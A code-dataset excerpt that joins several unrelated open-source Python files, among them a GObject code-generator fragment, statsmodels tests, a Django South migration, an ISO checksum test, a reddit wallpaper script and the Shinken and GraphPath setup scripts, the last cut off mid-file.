res += indent_level * "\t"
return res
def _method_signature_by_name(self,
cls,
method_name,
suppress_param_names=False,
insert_line_breaks=True,
indent_level=1,
instance_name="self"
):
minfo = cls.get_method_info(method_name)
return self._method_signature(
minfo.def_origin,
minfo.method,
suppress_param_names,
insert_line_breaks,
indent_level,
instance_name
)
def _method_by_name(self, cls, method_name, intf=None):
minfo = cls.get_method_info(method_name, intf)
return minfo.method
def _method_def_class(self, cls, method_name, intf=None):
minfo = cls.get_method_info(method_name, intf)
if minfo:
return minfo.def_origin
else:
raise Exception("No class found for method '%s'" % method_name)
def _method_def_class_cast(self, cls, method_name, intf=None):
minfo = cls.get_method_info(method_name, intf)
defcls = minfo.def_origin
class_name = self._name_creator.replace_camel_case(defcls.name, "_").upper()
module_prefix = ""
module = defcls.module
while module and module.name:
if module_prefix:
module_prefix = "_" + module_prefix
module_prefix = module.name.upper() + module_prefix
module = module.module
res = class_name + "_CLASS"
if module_prefix:
res = module_prefix + "_" + res
return res
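    # Illustrative example (names assumed): for a method defined by class
    # "Button" in module "ui", this yields the cast macro name
    # "UI_BUTTON_CLASS".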
def _signal_technical_name(self, signal):
return signal.name.replace("-", "_")
def _signal_section_defhandler(self, signal):
return "default_handler_" + self._signal_technical_name(signal)
def _rearrange_asterisk(self, typename, parname=None):
match = self._regex_type_w_ptrs.match(typename)
if match:
if parname:
typename = match.group(1)
parname = match.group(3) + parname
else:
typename = match.group(1) + " " + match.group(3)
if parname:
return typename + " " + parname
else:
return typename
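    # For example, _rearrange_asterisk("GObject*", "obj") returns
    # "GObject *obj", while _rearrange_asterisk("GObject*") returns "GObject *".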
def _property_flags(self, prop):
flags = ""
for access_mode in prop.access:
if flags:
flags += "|"
flags += {
PropAccess.READ: "G_PARAM_READABLE",
PropAccess.WRITE: "G_PARAM_WRITABLE",
PropAccess.INIT: "G_PARAM_CONSTRUCT",
PropAccess.INIT_ONLY: "G_PARAM_CONSTRUCT_ONLY"
}[access_mode]
return flags
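    # For example, a property with read and write access yields
    # "G_PARAM_READABLE|G_PARAM_WRITABLE" (in the order of the access list).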
def _property_value(self, val):
if val.literal:
return val.literal
elif val.number_info:
if not val.number_info.decimals:
return "%d" % val.number_info.digits
else:
return "%d.%d" % (val.number_info.digits, val.number_info.decimals)
elif val.code_info:
enum_name = self._name_creator.create_full_type_name(val.code_info.enumeration)
enum_name = self._name_creator.replace_camel_case(enum_name, "_").upper()
return enum_name + "_" + val.code_info.code_name
elif val.boolean is not None:
            return "TRUE" if val.boolean else "FALSE"
def _property_gtype(self, gtype_value):
if gtype_value.gtype_id:
return gtype_value.gtype_id
else:
return self._name_creator.create_type_macro(gtype_value.type)
def _property_setter_section(self, prop):
return "setter_" + prop.name.replace("-", "_").lower()
def _property_getter_section(self, prop):
return "getter_" + prop.name.replace("-", "_").lower()
def _property_set_section(self, prop):
return "set_" + prop.name.replace("-", "_").lower()
def _property_get_section(self, prop):
return "get_" + prop.name.replace("-", "_").lower()
def _interface_impl_funcname(self, cls, intf, method_name):
method_prefix = intf.cfunc_prefix or intf.name.lower()
        module_prefix = self._module_prefix_relative(intf.module, cls.module)
        if module_prefix:
            method_prefix = module_prefix + "_" + method_prefix
return method_prefix + "_" + method_name
def _is_property_init_required(self, obj):
if obj.get_properties():
return True
for intf in obj.interfaces:
if intf.properties:
return True
return False
def _module_prefix(self, module):
res = module.cfunc_prefix or module.name.lower()
curmod = module
while curmod.module:
curmod = curmod.module
tmp = curmod.cfunc_prefix or curmod.name.lower()
if tmp:
res = tmp + "_" + res
return res
def _module_prefix_relative(self, module, root):
res = ""
abspath_module = self._get_abs_module_path(module)
abspath_root = self._get_abs_module_path(root)
len_rootpath = len(abspath_root)
relpath = []
for idx, m in enumerate(abspath_module):
if not relpath and idx < len_rootpath and m == abspath_root[idx]:
continue
relpath.append(m)
for m in relpath:
if res:
res += "_"
res += m.cfunc_prefix or m.name.lower()
return res
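    # Illustrative example (module names assumed): for an interface in module
    # "a.b.c" referenced from a class in module "a", the relative prefix is
    # "b_c".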
def _get_abs_module_path(self, module):
res = [module]
curmod = module
while curmod.module:
curmod = curmod.module
res.insert(0, curmod)
return res
| apache-2.0 | 763,292,699,945,116,500 | 36.464824 | 127 | 0.539653 | false |
klahnakoski/MySQL-to-S3 | mysql_to_s3/__init__.py | 1 | 1965 | # encoding: utf-8
#
#
# This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this file,
# You can obtain one at http://mozilla.org/MPL/2.0/.
#
# Author: Kyle Lahnakoski ([email protected])
#
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from mo_dots import wrap
from mo_logs import strings
from pyLibrary.aws import s3
def _key2etl(key):
"""
CONVERT S3 KEY TO ETL HEADER
S3 NAMING CONVENTION: a.b.c WHERE EACH IS A STEP IN THE ETL PROCESS
HOW TO DEAL WITH a->b AS AGGREGATION? b:a.c? b->c is agg: a.c:b
"""
key = s3.strip_extension(key)
tokens = []
s = 0
i = strings.find(key, [":", "."])
while i < len(key):
tokens.append(key[s:i])
tokens.append(key[i])
s = i + 1
i = strings.find(key, [":", "."], s)
tokens.append(key[s:i])
_reverse_aggs(tokens)
# tokens.reverse()
source = {
"id": format_id(tokens[0])
}
for i in range(2, len(tokens), 2):
source = {
"id": format_id(tokens[i]),
"source": source,
"type": "join" if tokens[i - 1] == "." else "agg"
}
return wrap(source)
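# Illustrative example (assumed, not from the original tests):
# _key2etl("a.b.c") yields the nested header
# {"id": "c", "type": "join",
#  "source": {"id": "b", "type": "join", "source": {"id": "a"}}}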
def _reverse_aggs(seq):
# SHOW AGGREGATION IN REVERSE ORDER (ASSUME ONLY ONE)
for i in range(1, len(seq), 2):
if seq[i] == ":":
seq[i - 1], seq[i + 1] = seq[i + 1], seq[i - 1]
def format_id(value):
"""
:param value:
:return: int() IF POSSIBLE
"""
try:
return int(value)
except Exception:
return unicode(value)
def lt(l, r):
"""
:param l: left key
:param r: right key
    :return: True if l < r; a None key on either side is treated as an open bound
"""
if r is None or l is None:
return True
for ll, rr in zip(l, r):
if ll < rr:
return True
elif ll > rr:
return False
return False
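# For example, lt((1, 2), (1, 3)) is True and lt((2,), (1,)) is False; a None
# key on either side is treated as an open bound, so lt(None, (1,)) is True.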
| mpl-2.0 | 562,157,114,475,749,760 | 21.586207 | 75 | 0.553181 | false |
pprett/statsmodels | statsmodels/graphics/tests/test_functional.py | 1 | 2742 | import numpy as np
from numpy.testing import dec, assert_equal, assert_almost_equal
from statsmodels.graphics.functional import \
banddepth, fboxplot, rainbowplot
try:
import matplotlib.pyplot as plt
have_matplotlib = True
except ImportError:
have_matplotlib = False
def test_banddepth_BD2():
xx = np.arange(500) / 150.
y1 = 1 + 0.5 * np.sin(xx)
y2 = 0.3 + np.sin(xx + np.pi/6)
y3 = -0.5 + np.sin(xx + np.pi/6)
y4 = -1 + 0.3 * np.cos(xx + np.pi/6)
data = np.asarray([y1, y2, y3, y4])
depth = banddepth(data, method='BD2')
expected_depth = [0.5, 5./6, 5./6, 0.5]
assert_almost_equal(depth, expected_depth)
## Plot to visualize why we expect this output
#fig = plt.figure()
#ax = fig.add_subplot(111)
#for ii, yy in enumerate([y1, y2, y3, y4]):
# ax.plot(xx, yy, label="y%s" % ii)
#ax.legend()
#plt.show()
def test_banddepth_MBD():
xx = np.arange(5001) / 5000.
y1 = np.zeros(xx.shape)
y2 = 2 * xx - 1
y3 = np.ones(xx.shape) * 0.5
y4 = np.ones(xx.shape) * -0.25
data = np.asarray([y1, y2, y3, y4])
depth = banddepth(data, method='MBD')
expected_depth = [5./6, (2*(0.75-3./8)+3)/6, 3.5/6, (2*3./8+3)/6]
assert_almost_equal(depth, expected_depth, decimal=4)
@dec.skipif(not have_matplotlib)
def test_fboxplot_rainbowplot():
"""Test fboxplot and rainbowplot together, is much faster."""
def harmfunc(t):
"""Test function, combination of a few harmonic terms."""
        # Constant, 0 with p=0.9, 1 with p=0.1 - for creating outliers
ci = int(np.random.random() > 0.9)
a1i = np.random.random() * 0.05
a2i = np.random.random() * 0.05
b1i = (0.15 - 0.1) * np.random.random() + 0.1
b2i = (0.15 - 0.1) * np.random.random() + 0.1
func = (1 - ci) * (a1i * np.sin(t) + a2i * np.cos(t)) + \
ci * (b1i * np.sin(t) + b2i * np.cos(t))
return func
np.random.seed(1234567)
# Some basic test data, Model 6 from Sun and Genton.
t = np.linspace(0, 2 * np.pi, 250)
data = []
for ii in range(20):
data.append(harmfunc(t))
# fboxplot test
fig = plt.figure()
ax = fig.add_subplot(111)
_, depth, ix_depth, ix_outliers = fboxplot(data, wfactor=2, ax=ax)
ix_expected = np.array([13, 4, 15, 19, 8, 6, 3, 16, 9, 7, 1, 5, 2,
12, 17, 11, 14, 10, 0, 18])
assert_equal(ix_depth, ix_expected)
ix_expected2 = np.array([2, 11, 17, 18])
assert_equal(ix_outliers, ix_expected2)
plt.close(fig)
# rainbowplot test (re-uses depth variable)
xdata = np.arange(data[0].size)
fig = rainbowplot(data, xdata=xdata, depth=depth, cmap=plt.cm.rainbow)
plt.close(fig)
| bsd-3-clause | 247,066,859,032,231,900 | 29.466667 | 74 | 0.574398 | false |
gamnor/olhoneles | montanha/migrations/0007_auto__add_pernaturebyyear__add_pernature.py | 1 | 10393 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding model 'PerNatureByYear'
db.create_table(u'montanha_pernaturebyyear', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('institution', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.Institution'])),
('year', self.gf('django.db.models.fields.IntegerField')()),
('nature', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.ExpenseNature'])),
('expensed', self.gf('django.db.models.fields.DecimalField')(max_digits=10, decimal_places=2)),
))
db.send_create_signal(u'montanha', ['PerNatureByYear'])
# Adding model 'PerNature'
db.create_table(u'montanha_pernature', (
(u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
('institution', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.Institution'])),
('legislature', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.Legislature'], null=True, blank=True)),
('date_start', self.gf('django.db.models.fields.DateField')()),
('date_end', self.gf('django.db.models.fields.DateField')()),
('nature', self.gf('django.db.models.fields.related.ForeignKey')(to=orm['montanha.ExpenseNature'])),
('expensed', self.gf('django.db.models.fields.DecimalField')(max_digits=10, decimal_places=2)),
))
db.send_create_signal(u'montanha', ['PerNature'])
def backwards(self, orm):
# Deleting model 'PerNatureByYear'
db.delete_table(u'montanha_pernaturebyyear')
# Deleting model 'PerNature'
db.delete_table(u'montanha_pernature')
models = {
u'montanha.archivedexpense': {
'Meta': {'object_name': 'ArchivedExpense'},
'collection_run': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.CollectionRun']"}),
'date': ('django.db.models.fields.DateField', [], {}),
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mandate': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Mandate']"}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'supplier': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Supplier']"}),
'value': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'})
},
u'montanha.collectionrun': {
'Meta': {'object_name': 'CollectionRun'},
'date': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'legislature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislature']"})
},
u'montanha.expense': {
'Meta': {'object_name': 'Expense'},
'date': ('django.db.models.fields.DateField', [], {}),
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mandate': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Mandate']"}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"}),
'number': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'supplier': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Supplier']"}),
'value': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '10', 'decimal_places': '2', 'blank': 'True'})
},
u'montanha.expensenature': {
'Meta': {'object_name': 'ExpenseNature'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'})
},
u'montanha.institution': {
'Meta': {'object_name': 'Institution'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'siglum': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'})
},
u'montanha.legislator': {
'Meta': {'object_name': 'Legislator'},
'about': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_of_birth': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'null': 'True', 'blank': 'True'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048'}),
'original_id': ('django.db.models.fields.TextField', [], {}),
'picture': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'site': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'montanha.legislature': {
'Meta': {'object_name': 'Legislature'},
'date_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'institution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Institution']"}),
'original_id': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'})
},
u'montanha.mandate': {
'Meta': {'object_name': 'Mandate'},
'date_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'date_start': ('django.db.models.fields.DateField', [], {}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'legislator': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislator']"}),
'legislature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislature']"}),
'party': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.PoliticalParty']", 'null': 'True', 'blank': 'True'})
},
u'montanha.pernature': {
'Meta': {'object_name': 'PerNature'},
'date_end': ('django.db.models.fields.DateField', [], {}),
'date_start': ('django.db.models.fields.DateField', [], {}),
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'institution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Institution']"}),
'legislature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Legislature']", 'null': 'True', 'blank': 'True'}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"})
},
u'montanha.pernaturebyyear': {
'Meta': {'object_name': 'PerNatureByYear'},
'expensed': ('django.db.models.fields.DecimalField', [], {'max_digits': '10', 'decimal_places': '2'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'institution': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.Institution']"}),
'nature': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['montanha.ExpenseNature']"}),
'year': ('django.db.models.fields.IntegerField', [], {})
},
u'montanha.politicalparty': {
'Meta': {'object_name': 'PoliticalParty'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'logo': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '2048', 'null': 'True', 'blank': 'True'}),
'siglum': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '10'}),
'wikipedia': ('django.db.models.fields.URLField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
u'montanha.supplier': {
'Meta': {'object_name': 'Supplier'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'identifier': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
}
}
complete_apps = ['montanha'] | agpl-3.0 | -336,951,130,467,373,200 | 68.293333 | 151 | 0.560185 | false |
alfredodeza/merfi | merfi/tests/test_iso.py | 1 | 1951 | import os
import pytest
import subprocess
from merfi.iso import Iso
from merfi.util import which
class TestIso(object):
def create_fake_iso(self, output_dir):
""" Create a fake ISO file, without genisoimage """
iso = Iso([])
f = output_dir.join('test.iso')
f.write('ISOCONTENTS')
iso.output = str(f)
iso.make_sha256sum()
return iso
def create_real_iso(self, output_dir):
""" Create a "real" ISO file, using make_iso() (ie genisoimage) """
# simple contents
compose_dir = output_dir.mkdir('my-test-contents')
f = compose_dir.join('contents.txt')
f.write('This text file will be on our ISO')
iso = Iso([])
argv = ['merfi', str(output_dir.join('my-test-contents'))]
iso.parse_args(argv)
iso.make_iso()
iso.make_sha256sum()
return iso
def test_sha256sum_contents(self, tmpdir):
iso = self.create_fake_iso(tmpdir)
with open(iso.output_checksum, 'r') as chsumf:
assert chsumf.read() == "d8d322f6864229f8c9ef1b0845dd9e182c563c508fec30618fdb9b57c70a0147 test.iso\n"
# Validate output_checksum's syntax with sha256sum.
# The reason we shell out to sha256sum here is that it functionally
# validates what a user would do with this ISO's checksum file: a user
# would run `sha256sum -c` on it.
@pytest.mark.skipif(which('sha256sum') is None, reason='sha256sum is not installed')
def test_sha256sum_command(self, tmpdir):
iso = self.create_fake_iso(tmpdir)
os.chdir(os.path.dirname(iso.output_checksum))
assert subprocess.call(['sha256sum', '-c', iso.output_checksum]) == 0
@pytest.mark.skipif(which('genisoimage') is None, reason='genisoimage is not installed')
def test_make_iso(self, tmpdir):
iso = self.create_real_iso(tmpdir)
assert os.path.isfile(str(tmpdir.join('my-test-contents-dvd.iso')))
| mit | -8,617,623,521,715,342,000 | 38.02 | 114 | 0.644285 | false |
roccoma504/reddit_wallpaper | reddit_mac_wallpaper.py | 1 | 1030 | #!/usr/bin/python
# This script changes the wallpaper of the current OSX desktop. It will change the wallpaper of the desktop on each screen but not each desktop.
from AppKit import NSWorkspace, NSScreen
from Foundation import NSURL
import os
import praw
import urllib
# Define the reddit object.
r = praw.Reddit(user_agent='User-Agent: osx:com.frocco.reddit_wallpaper:v0.1 (by /u/roclobster)')
# Retrieve and save the top image of /r/WQHD_Wallpaper
testfile = urllib.URLopener()
testfile.retrieve(list(r.get_subreddit('WQHD_Wallpaper').get_top(limit=1))[0].url, "reddit_wallpaper.jpg")
# Generate a fileURL for the desktop picture
file_url = NSURL.fileURLWithPath_(os.getcwd() + "/reddit_wallpaper.jpg")
# Get shared workspace
ws = NSWorkspace.sharedWorkspace()
# Iterate over all screens
for screen in NSScreen.screens():
# Tell the workspace to set the desktop picture
(result, error) = ws.setDesktopImageURL_forScreen_options_error_(file_url, screen, {}, None)
if error:
print error
exit(-1) | mit | 7,633,890,986,158,433,000 | 33.366667 | 144 | 0.74466 | false |
gjhiggins/graphpath | setup.py | 1 | 3436 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import re
def setup_python3():
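    """Copy the sources listed in MANIFEST.in to build/src, run 2to3 on the
    .py files, and return the new source root (descriptive summary of the
    steps below)."""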
# Taken from "distribute" setup.py
from distutils.filelist import FileList
from distutils import dir_util, file_util, util, log
from os.path import join, exists
tmp_src = join("build", "src")
if exists(tmp_src):
dir_util.remove_tree(tmp_src)
log.set_verbosity(1)
fl = FileList()
for line in open("MANIFEST.in"):
if not line.strip():
continue
fl.process_template_line(line)
dir_util.create_tree(tmp_src, fl.files)
outfiles_2to3 = []
for f in fl.files:
outf, copied = file_util.copy_file(f, join(tmp_src, f), update=1)
if copied and outf.endswith(".py"):
outfiles_2to3.append(outf)
util.run_2to3(outfiles_2to3)
# arrange setup to use the copy
sys.path.insert(0, tmp_src)
return tmp_src
# Find version. We have to do this because we can't import it in Python 3
# until it has been automatically converted in the setup process.
def find_version(filename):
_version_re = re.compile(r'__version__ = "(.*)"')
for line in open(filename):
version_match = _version_re.match(line)
if version_match:
return version_match.group(1)
__version__ = find_version('graphpath/__init__.py')
config = dict(
name="GraphPath",
version=__version__,
author="Arnold deVos",
author_email="[email protected]",
url="http://www.langdale.com.au/GraphPath/",
maintainer="Graham Higgins",
maintainer_email="[email protected]",
packages=['graphpath', 'graphpath.util'],
description="A little-language for analysing" +
" graph-structured data, especially RDF.",
long_description=""""A little-language for analysing RDF,
the syntax of the GraphPath is reminiscent of Xpath.
The graphpath package provides a query evaluator
and a goal-driven inference engine for this language,
which work together to perform graph analysis. The package
can be teamed up with your favourite python RDF API
(e.g. Redland, RDFLib, or your own API).
""",
license='GNU General Public License (GPL)',
classifiers=[
"Programming Language :: Python",
"Programming Language :: Python :: 2",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 2.5",
"Programming Language :: Python :: 2.6",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.2",
"Natural Language :: English",
'Development Status :: 4 - Beta',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Operating System :: OS Independent',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Internet :: RDF'
],
test_suite="test",
)
install_requires = ["rdflib>=3.0"]
if sys.version_info[0] >= 3:
from setuptools import setup
config.update({'use_2to3': True})
config.update({'src_root': setup_python3()})
else:
try:
from setuptools import setup
config.update({'test_suite': "nose.collector"})
except ImportError:
from distutils.core import setup
config['install_requires'] = install_requires
setup(**config)
| gpl-2.0 | 8,497,947,675,394,319,000 | 32.686275 | 79 | 0.634459 | false |
xorpaul/shinken | setup.py | 1 | 23086 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright (C) 2009-2012:
# Gabes Jean, [email protected]
# Gerhard Lausser, [email protected]
# Gregory Starck, [email protected]
# Hartmut Goebel, [email protected]
#
# This file is part of Shinken.
#
# Shinken is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Shinken is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with Shinken. If not, see <http://www.gnu.org/licenses/>.
# Shinken requires Python 2.6, but does not support Python 3.x yet.
import sys
try:
python_version = sys.version_info
except:
python_version = (1, 5)
if python_version < (2, 6):
sys.exit("Shinken require as a minimum Python 2.6.x, sorry")
elif python_version >= (3,):
sys.exit("Shinken is not yet compatible with Python3k, sorry")
from setuptools import setup, find_packages
from glob import glob
import os
import itertools
import ConfigParser
try:
import pwd
import grp
except ImportError:
# assume non-unix platform
pass
DEFAULT_OWNER = 'shinken'
DEFAULT_GROUP = 'shinken'
from distutils import log
from distutils.core import Command
from distutils.command.build import build as _build
from distutils.command.install import install as _install
from distutils.util import change_root
from distutils.errors import DistutilsOptionError
# We try to see if we are in a full install or an update process
is_update = False
if 'update' in sys.argv:
print "Shinken Lib Updating process only"
sys.argv.remove('update')
sys.argv.insert(1, 'install')
is_update = True
# If we install/update, for the force option to always overwrite the
# shinken lib and scripts
if 'install' in sys.argv and not '-f' in sys.argv:
sys.argv.append('-f')
is_install = 'install' in sys.argv
# Utility function to read the README file. This was directly taken from:
# http://packages.python.org/an_example_pypi_project/setuptools.html
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
class build(_build):
sub_commands = _build.sub_commands + [
('build_config', None),
]
user_options = _build.user_options + [
('build-config', None, 'directory to build the config files to'),
]
def initialize_options(self):
_build.initialize_options(self)
self.build_config = None
def finalize_options (self):
_build.finalize_options(self)
if self.build_config is None:
self.build_config = os.path.join(self.build_base, 'etc')
class install(_install):
sub_commands = _install.sub_commands + [
('install_config', None),
]
user_options = _install.user_options + [
('etc-path=', None, 'read-only single-machine data'),
('var-path=', None, 'modifiable single-machine data'),
('run-path=', None, 'PID files'),
('log-path=', None, 'LOG files'),
('plugins-path=', None, 'program executables'),
('owner=', None, (
'change owner for etc/*, var, run and log folders (default: %s)' % DEFAULT_OWNER
)
),
('group=', None, (
'change group for etc/*, var, run and log folders (default: %s)' % DEFAULT_GROUP
)
),
]
def initialize_options(self):
_install.initialize_options(self)
self.etc_path = None
self.var_path = None
self.run_path = None
self.log_path = None
self.plugins_path = None
self.owner = None
self.group = None
def finalize_options(self):
_install.finalize_options(self)
if self.etc_path is None:
self.etc_path = default_paths['etc']
if self.var_path is None:
self.var_path = default_paths['var']
if self.run_path is None:
self.run_path = default_paths['run']
if self.log_path is None:
self.log_path = default_paths['log']
if self.plugins_path is None:
self.plugins_path = default_paths['libexec']
if self.owner is None:
self.owner = DEFAULT_OWNER
if self.group is None:
self.group = DEFAULT_GROUP
class build_config(Command):
description = "build the shinken config files"
user_options = [
('build-dir=', None, "directory to build the config files to"),
]
def initialize_options (self):
self.build_dir = None
self.build_base = None
self.root = None
self.etc_path = None
self.var_path = None
self.run_path = None
self.log_path = None
self.plugins_path = None
self._install_scripts = None
self.owner = None
self.group = None
def finalize_options (self):
self.set_undefined_options('build',
('build_base', 'build_base'),
('build_config', 'build_dir'),
)
self.set_undefined_options('install',
('install_scripts', '_install_scripts'),
)
self.set_undefined_options('install_config',
('root', 'root'),
('etc_path', 'etc_path'),
('var_path', 'var_path'),
('run_path', 'run_path'),
('log_path', 'log_path'),
('plugins_path', 'plugins_path'),
('owner', 'owner'),
('group', 'group')
)
if self.build_dir is None:
self.build_dir = os.path.join(self.build_base, 'etc')
def run(self):
if not self.dry_run:
self.mkpath(self.build_dir)
# We generate the conf files only for a full install
if not is_update:
self.generate_default_shinken_file()
self.update_configfiles()
self.copy_objects_file()
def generate_default_shinken_file(self):
# The default file must have good values for the directories:
# etc, var and where to push scripts that launch the app.
templatefile = "bin/default/shinken.in"
outfile = os.path.join(self.build_base, "bin/default/shinken")
log.info('generating %s from %s', outfile, templatefile)
if not self.dry_run:
self.mkpath(os.path.dirname(outfile))
bin_path = self._install_scripts
if self.root:
bin_path = bin_path.replace(self.root.rstrip(os.path.sep), '')
# Read the template file
f = open(templatefile)
buf = f.read()
f.close
# substitute
buf = buf.replace("$ETC$", self.etc_path)
buf = buf.replace("$VAR$", self.var_path)
buf = buf.replace("$RUN$", self.run_path)
buf = buf.replace("$LOG$", self.log_path)
buf = buf.replace("$SCRIPTS_BIN$", bin_path)
# write out the new file
f = open(outfile, "w")
f.write(buf)
f.close()
def copy_objects_file(self):
for name in config_objects_file:
inname = os.path.join('etc', name)
outname = os.path.join(self.build_dir, name)
log.info('Copying data files in: %s out: %s' % (inname, outname))
append_file_with(inname, outname, "")
# Creating some needed directories
discovery_dir = os.path.join(self.build_dir + "/objects/discovery")
if not os.path.exists(discovery_dir):
os.makedirs(discovery_dir)
for dirname in [self.var_path, self.run_path, self.log_path]:
if self.build_base:
if not is_install:
dirname = os.path.join(self.build_base, os.path.relpath(dirname, '/')) #dirname)
else:
dirname = os.path.join(self.build_base, dirname)
if self.root:
dirname = change_root(self.root, dirname)
if not os.path.exists(dirname):
os.makedirs(dirname)
def update_configfiles(self):
# Here, even with --root we should change the file with good values
# then update the /etc/*d.ini files ../var value with the real var one
        # Open a /etc/*d.ini file and change the ../var occurrence with a
# good value from the configuration file
for (dname, name) in daemon_ini_files:
inname = os.path.join('etc', name)
outname = os.path.join(self.build_dir, name)
log.info('Updating path in %s->%s: to "%s"' % (inname, outname, self.var_path))
# but we have to force the user/group & workdir values still:
append_file_with(inname, outname, """
#Overriding default values
user=%s
group=%s
workdir=%s
logdir=%s
pidfile=%s/%sd.pid
""" % (self.owner, self.group, self.var_path, self.log_path, self.run_path, dname))
# And now the resource.cfg path with the value of libexec path
# Replace the libexec path by the one in the parameter file
for name in resource_cfg_files:
inname = os.path.join('etc', name)
outname = os.path.join(self.build_dir, name)
log.info('updating path in %s', outname)
update_file_with_string(inname, outname,
"/usr/local/shinken/libexec",
self.plugins_path)
# And update the shinken.cfg file for all /usr/local/shinken/var
# value with good one
for name in main_config_files:
inname = os.path.join('etc', name)
outname = os.path.join(self.build_dir, name)
log.info('updating path in %s', outname)
            ## but we HAVE to set the shinken_user & shinken_group to those requested:
append_file_with(inname, outname, """
